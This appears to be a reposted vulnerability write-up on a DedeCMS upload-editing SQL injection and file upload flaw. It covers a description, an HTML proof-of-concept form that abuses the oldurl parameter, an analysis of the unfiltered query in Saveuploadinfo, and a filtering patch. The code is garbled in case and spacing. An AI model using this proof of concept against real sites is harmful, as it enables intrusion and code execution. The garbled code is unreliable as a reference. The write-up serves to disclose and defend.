dedecms/member/uploads_edit.php SQL Injection Vul

Source: Internet
Author: User
Tags sql injection cve

Catalog

1 . Vulnerability Description 2 . Vulnerability trigger Condition 3 . Vulnerability Impact Range 4 . Vulnerability Code Analysis 5 . Defense Methods 6. Defensive thinking

1. Vulnerability description

Unrestricted file upload vulnerability in member/uploads_edit.php under version Dedecms 5.3 allows a remote attacker to execute arbitrary code by uploading a file with two extended filenames and then accessing the file with an unknown vector. This has been confirmed by the filename of the. jpg.php.

Relevant Link:

http://cve.scap.org.cn/cve-2009-2270.htmlhttp://www.cnnvd.org.cn/vulnerability/ show/cv_id/2009070008


2. Vulnerability Trigger Condition

0x1:poc

<form id="Frmupload"Enctype="Multipart/form-data"action="http://127.0.0.1/dedecms5.5/member/uploads_edit.php?dopost=save&title=ss&oldurl=1 '. PHP"Method="Post"><!--Oldurl is injection point--<input type="file"Name="Addonfile"Id="Addonfile"Size=" -"><br> <input name="Mode"Type="Hidden"Value="2"> <input id="Btnupload"Type="Submit"Value="Upload"></form>

Relevant Link:

http://www.wooyun.org/bug.php?action=view&id=48894http://  Www.2cto.com/Article/201012/80026.html


3. Vulnerability Impact Range
4. Vulnerability Code Analysis

/member/uploads_edit.php

Else if($dopost = ='Save') {$title= Htmlreplace ($title,2); if($mediatype = =1) $utype ='Image'; Else if($mediatype = =2) {$utype='Flash'; }    Else if($mediatype = =3) {$utype='Media'; }    Else{$utype='addon'; } $title= Htmlreplace ($title,2); //get the "." The previous file name$exname = Ereg_replace ("(.*)/","", $oldurl); //get the "." Extensions other than the$exname = Ereg_replace ("\. (.*)$","", $exname); //returns the uploaded file name$filename = Memberuploads ('Addonfile', $oldurl, $cfg _ml->m_id, $utype, $exname,-1,-1,true); //$filename bring into function querySaveuploadinfo ($title, $filename, $mediatype); ShowMsg ("successfully modified the file! ","uploads_edit.php?aid= $aid");}

\member\inc\inc_archives_functions.php

function Saveuploadinfo ($title, $filename, $medaitype =1, $addinfos ="'){    Global$dsql, $cfg _ml, $cfg _basedir; if($filename = ="')    {        return false; }    if(!Is_array ($addinfos)) {$addinfos [0] = $addinfos [1] = $addinfos [2] =0; }    if($medaitype = =1) {$info="'; $addinfos=getimagesize ($cfg _basedir $filename, $info); } $addinfos [2] =@filesize ($cfg _basedir. $filename); $row= $dsql->getone ("Select aid,title,url from ' #@__uploads ' where URL like ' $filename ' and mid= '". $cfg _ml->m_id."';"); $uptime=Time (); if(Is_array ($row)) {$query="Update ' #@__uploads ' Set title= ' $title ', mediatype= ' $medaitype ',Width='{$addinfos [0]}', height='{$addinfos [1]}', filesize='{$addinfos [2]}', uptime='$uptime'                     whereAid='{$row ['Aid']}';";$dsqlexecutenonequery ($query); }    Else    {        //SQL injection is brought into SQL query $filename not filtered$inquery ="INSERT into ' #@__uploads ' (title,url,mediatype,width,height,playtime,filesize,uptime,mid)VALUES ('$title','$filename','$medaitype','". $addinfos [0]."','". $addinfos [1]."','0','". $addinfos [2]."','$uptime','". $cfg _ml->m_id."');";$dsqlexecutenonequery ($inquery); }    return true;}


5. Defense Methods

/member/uploads_edit.php

Else if($dopost = ='Save') {$title= Htmlreplace ($title,2); if($mediatype = =1) $utype ='Image'; Else if($mediatype = =2) {$utype='Flash'; }    Else if($mediatype = =3) {$utype='Media'; }    Else{$utype='addon'; } $title= Htmlreplace ($title,2); /*effective filtering of the $oldurl*/$oldurl=Htmlreplace ($oldurl); /* */$exname= Preg_replace ("#(.*)/#","", $oldurl); $exname= Preg_replace ("#\. (.*)$#","", $exname); $filename= Memberuploads ('Addonfile', $oldurl, $cfg _ml->m_id, $utype, $exname,-1, -1, TRUE);    Saveuploadinfo ($title, $filename, $mediatype); ShowMsg ("successfully modified the file! ","uploads_edit.php?aid= $aid");}


6. Defensive Thinking

Copyright (c) Littlehann All rights reserved

dedecms/member/uploads_edit.php SQL Injection Vul

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.